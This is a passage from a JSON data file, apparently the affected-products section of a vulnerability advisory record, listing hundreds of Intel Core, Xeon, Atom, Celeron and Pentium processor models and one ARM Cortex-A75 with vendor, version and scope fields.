        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210y"
      },
      {
        "model": "xeon e5 2648l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1275",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2700k"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4600u"
      },
      {
        "model": "xeon e5 1650 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2450 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4310u"
      },
      {
        "model": "cortex-a",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": "75"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6138f"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "860s"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3115c"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660lm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4785t"
      },
      {
        "model": "xeon e3 1230l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8870"
      },
      {
        "model": "xeon e3 1270 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4288u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2637m"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3570"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2316"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2125"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3330s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4590t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6600t"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y70"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5609"
      },
      {
        "model": "xeon e5 2609",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2630 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2630l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1558l_v5"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2629m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5600u"
      },
      {
        "model": "xeon bronze 3106",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "980x"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4760hq"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3770d"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "460m"
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j3355"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6126t"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3590"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4350"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5700hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2600k"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2516"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210m"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5677"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4110m"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8890_v4"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5502"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5620"
      },
      {
        "model": "xeon e5 2440 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6128"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3210m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770r"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8176"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3858"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650_v4"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n4100"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300hq"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5606"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2580"
      },
      {
        "model": "xeon e5 2623 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4500u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770te"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3615qe"
      },
      {
        "model": "xeon e3 1290",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y31"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7560u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5950hq"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2698_v3"
      },
      {
        "model": "pentium j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j4205"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "640lm"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2880_v2"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2667_v4"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200u"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "w5590"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4170t"
      },
      {
        "model": "xeon e5 2450l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3360m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4310m"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3558"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "450m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700hq"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4628l_v4"
      },
      {
        "model": "xeon e5 1620 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2870"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8894_v4"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2130"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1545m_v5"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610_v2"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6140m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2630qm"
      },
      {
        "model": "xeon e3 1240 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2637 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2102"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2750"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4590s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2510e"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6320"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2860qm"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4660_v3"
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3205rk"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700k"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e7520"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n4000"
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y10c"
      },
      {
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3530"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4430"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "960"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4030y"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2675qm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700"
      },
      {
        "model": "xeon e3 1285 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2600"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2660_v3"
      },
      {
        "model": "xeon e5 2630l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8850"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4890_v2"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5115"
      },
      {
        "model": "xeon e3 1231 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3450s"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2467m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2450p"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5630"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570s"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3736f"
      },
      {
        "model": "xeon e5 2603",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7600u"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "lc5518"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3470t"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3517u"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8870_v3"
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7290f"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6006u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5350u"
      },
      {
        "model": "xeon e5 2650",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4370"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2120t"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2683_v4"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850_v2"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4712hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5650u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5257u"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6142"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4100u"
      },
      {
        "model": "xeon phi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7230"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670_v3"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2830"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790k"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3250"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "660ue"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6585r"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620um"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8350u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "990x"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770s"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2665"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "750s"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8176m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5550u"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6132"
      },
      {
        "model": "xeon e3 1280",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2450l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4340te"
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j4105"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4590"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3555le"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2667_v3"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3440"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2840"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6126"
      },
      {
        "model": "xeon e3 1125c v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1225 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1275 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2330e"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4669_v3"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l3406"
      },
      {
        "model": "xeon e3 1505l v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3950"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "430m"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2520"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x3430"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1578l_v5"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4200m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4570s"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2699r_v4"
      },
      {
        "model": "xeon e5 2628l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5603"
      },
      {
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4108"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "540"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670s"
      },
      {
        "model": "xeon e5 1630 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4116"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3750"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2500k"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5530"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3635qm"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670t"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3560"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3050"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "720qm"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3340"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3340m"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100h"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2738"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6442eq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4790s"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2377m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "880"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7500u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "860"
      },
      {
        "model": "pentium n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3510"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2310e"
      },
      {
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3815"
      },
      {
        "model": "xeon e5 2648l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2420"
      },
      {
        "model": "atom x3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3295rk"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2805"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "470um"
      },
      {
        "model": "xeon e5 1620",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2640 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2410m"
      },
      {
        "model": "xeon e3 1235l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "520um"
      },
      {
        "model": "xeon e5 2643 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5670"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8891_v2"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4440"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3720qm"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e7530"
      },
      {
        "model": "xeon e3 1240",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1220 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2120"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4400e"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770s"
      },
      {
        "model": "xeon e5 2648l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4030u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4340m"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2687w_v4"
      },
      {
        "model": "xeon e5 1650 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e3 1235",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2430l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2400s"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4880_v2"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6300u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5200u"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8837"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5557u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4750hq"
      },
      {
        "model": "core i3",
        "scope": "eq",
